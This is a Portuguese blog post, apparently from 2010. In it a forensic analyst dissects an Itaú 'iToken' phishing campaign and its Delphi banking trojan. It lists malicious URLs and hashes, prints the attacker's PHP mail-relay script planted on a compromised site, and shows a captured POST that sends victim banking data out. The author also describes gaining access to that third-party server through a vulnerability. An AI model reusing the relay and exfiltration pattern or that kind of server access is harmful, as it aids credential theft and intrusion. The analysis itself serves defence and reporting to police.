quinta-feira, 23 de dezembro de 2010

Perícia e Análise da Fraude Bancária iToken Itaú

 Elaborado por Ronaldo Lima

crimesciberneticos.com | twitter.com/crimescibernet

iToken é um dispositivo de senhas eletrônicas utilizado pelo Banco Itaú para adicionar mais uma barreira de proteção para seus clientes acessarem contas bancárias pela Internet. Nesse caso os fraudadores utilizam o nome do dispositivo na engenharia social para induzirem as vítimas a instalarem malwares em seus computadores.


Identificação e Coleta das Evidências

No dia 19/10/2010 recebi um spam phishing com os campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”. No e-mail havia um link que apontava para a URL:

http://dmcbattle.co.za/seguranca/dispositivo.php?InstalarAplicativo=ver1.3


Ao clicar no link foi solicitado o download do arquivo abaixo:

Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 124ecdd2bd55b9e2d28542ff3da65ef5

No dia 05/11/2010 recebi um outro phishing com os mesmos campos “De: Itaú Bankline” e “Assunto: Central de segurança Itaú: iToken v1.3”, porém o texto escrito nesse e-mail era diferente (apesar de ser sobre o mesmo tema) e o link apontava para outra URL:

http://acoffeeinthepark.com/logs/dispositivo.php?InstalarAplicativo=itokenv13-257823732654


Ao clicar no link foi solicitado o download de um arquivo com o mesmo nome, mas com MD5 diferente:

Nome: Aplicativov1.3.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: a36d31cac126e6ff56eb786e57c689af

Análise das Evidências

Para descobrir mais informações sobre os arquivos coletados, submeti o primeiro “Aplicativov1.3.exe” ao programa Exeinfo PE para identificar um possível packer no executável.


Nada foi encontrado, porém o programa também não conseguiu identificar a linguagem de programação utilizada. O mesmo aconteceu com o PEiD e RDG.

Prosseguindo submeti o arquivo ao OllyDbg. Na busca por strings relevantes também não identifiquei nenhuma pista sobre a função do arquivo até encontrar essa linha:

“Software\WinRAR SFX”


O módulo SFX (SelF-eXtrating) do WinRAR permite descomprimir arquivos automaticamente sem a necessidade de outros programas, o próprio executável carrega o módulo de descompressão.

Resolvi executar o arquivo para confirmar se seria descompactado algum outro executável. Ao fazer isso foi criado um novo arquivo:

Nome: iToken.exe (Trojan-Banker.Win32.Banker2.abp)
MD5: 51e5d6f6f0ff2bc0ae3792d98d12fdbe

O arquivo “iToken.exe” foi criado e executado automaticamente. Antes de analisar o funcionamento dele eu queria realizar a engenharia reversa, então matei o processo e o submeti ao Exeinfo PE.


Nenhum packer foi encontrado e a linguagem de programação foi identificada: Borland Delphi.

A análise de executáveis codificados em Delphi na maioria das vezes fica mais fácil através do descompilador DeDe do que o Assembly no OllyDbg. Então utilizei o DeDe para descompilar o “iToken.exe” e gerar um projeto para abrir depois no próprio Delphi.

O DeDe conseguiu identificar três Forms e Units no executável.


Ao abrir o projeto gerado pelo DeDe no Delphi e visualizar os três Forms, encontrei as telas utilizadas pelo malware:

Tela 1


Tela 2


Tela 3


Conforme pode-se ver, as três telas são cópias das páginas verdadeiras do site do Banco Itaú. Nelas são solicitadas várias informações bancárias que tentam persuadir as vítimas digitarem seus dados sigilosos.

Na Tela 3 do malware há um botão (que na verdade é uma imagem) denominado “CONFIRMAR”. No projeto do Delphi nesse botão há um evento “ImageClick” codificado, ou seja, quando ele é clicado executa alguma função.

A função nesse caso é bastante peculiar, enviar para o e-mail do fraudador todas as informações que a vítima digitou. Diferente do que ocorre na maioria das vezes, dessa vez o e-mail está em texto simples, sem criptografia.


No código logo abaixo do endereço de e-mail, há algo que me chamou atenção, uma URL.

http://www.oberoning.lv/plugins/system/fckgwrhqq2.php


A princípio não entendi a função dela no malware, mas resolvi investigar, queria saber o que havia no código-fonte desse arquivo “fckgwrhqq2.php”.

Para conseguir isso teria que descobrir qual vulnerabilidade o fraudador explorou para invadir o site www.oberoning.lv (Letônia). Meu amigo Bernardo descobriu isso pra mim e tive acesso ao servidor.


Fiz download do arquivo “fckgwrhqq2.php” e o código-fonte dele era esse:

<?php
$email = $_POST['email'] ;
$from = $_POST['from'];
$subject = $_POST['subject'];
$message = $_POST['message'] ;

mail( $email, $subject, $message, "From: $from" );
?>

Então na verdade não era o malware que enviava o e-mail, ele apenas passava os dados pela URL para essa página PHP que recebia e enviava a mensagem. Ele deve ter feito dessa forma para simplificar o código-fonte do malware.

Para confirmar todas essas informações e não deixar nenhuma dúvida, deixei rodando um sniffer de rede (Wireshark) e executei o malware inserindo dados falsos.

Os pacotes capturados geraram esse tráfego de rede:

POST /plugins/system/fckgwrhqq2.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Host: www.oberoning.lv
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

email=aXXXXXX%40gmail%2Ecom&from=iniciando%40exe%2Ecom&subject=VIRTUAL%5FXP&message=1111%0D11111%0D1%0D000000%0D01+01+01+01+01+01+%0D03+03+03+03+03+03+&


Lembrando que no começo do artigo escrevi que havia dois arquivos “Aplicativov1.3.exe” com MD5 diferentes, ao executar o segundo gerou também um “iToken.exe” com MD5 diferente.

Nome: iToken.exe (Trojan-Banker.Win32.Banker2.aer)
MD5: 9615a83c0cfca4793bbfb5206f3afa06

Esse segundo “iToken.exe” possuía exatamente as mesmas funções do primeiro analisado mas o endereço de e-mail e URL para onde ele enviava as informações furtadas era outra.


Conclusão

Nessa perícia foi possível constatar a materialidade da fraude, a dinâmica e apontar um caminho para identificar a autoria através dos endereços de e-mails encontrados. Todas as informações foram encaminhadas para a polícia civil.

Verificou-se a existência de dois malwares com funções idênticas mas com endereços de e-mails e spam distintos. Isso pode significar que o fraudador utiliza dados diferentes para aplicar o mesmo golpe ou ainda que esse malware foi vendido ou trocado por várias pessoas que apenas personalizam com seus e-mails.

O que costuma ocorrer bastante nesse tipo de crime, um programador cria o malware e vende para os fraudadores que não possuem muitos conhecimentos em computação e apenas adaptam de acordo com suas necessidades.

Quer ajudar no combate aos crimes cibernéticos? Caso também tenha recebido esse spam dizendo ser do Banco Itaú para atualização do iToken encaminhe para meu e-mail (crimesciberneticos@ymail.com) que farei a análise e enviarei para a polícia. Ou ainda caso você mesmo(a) queira fazer a análise, só me envie então os resultados.

[POST adicionado em 15/11/2010]

Conforme eu havia solicitado, o leitor Almir me enviou um spam que recebeu também referente a essa fraude do iToken Itaú. Nesse phishing, na engenharia social utilizaram a marca Itaú Personnalité para tentar enganar as vítimas.

Ao clicar no link do email foi solicitado o download do arquivo "iTokenv1.2.exe", esse arquivo seguia o mesmo padrão dos outros, ao executá-lo foi descompactado o arquivo "update.exe".

Aos descompilar o "update.exe" foram identificadas as mesmas telas da fraude, porém dessa vez as cores utilizadas no malware seguem o padrão do Itaú Personnalité. Novamente foi identificado um endereço de email para onde são enviados os dados furtados.

Agradeço a todos que colaboram com o Blog deixando comentários, enviando e-mails e divulgando. Caso ainda receba esse mesmo tipo de e-mail peço que me envie.

[POST adicionado em 23/12/2010]

A fraude do iToken Itaú ainda esta ativa, dessa vez foi o leitor Clenilson que me encaminhou o e-mail do golpe para análise. Esse ao clicar no link faz download do arquivo:

dispositivo.exe (MD5: 9d3b0096646d3ba27e5e5ed265e50912)

Após ser executado gera o arquivo:

dr.exe (MD5: 7caff8bdd3135362e0f36dea618a287d)

Apresenta uma janela para a vítima digitar os dados bancários e depois envia por e-mail para o fraudador conforme imagem abaixo:


Ronaldo Lima
crimesciberneticos.com | twitter.com/crimescibernet

Nenhum comentário:

Postar um comentário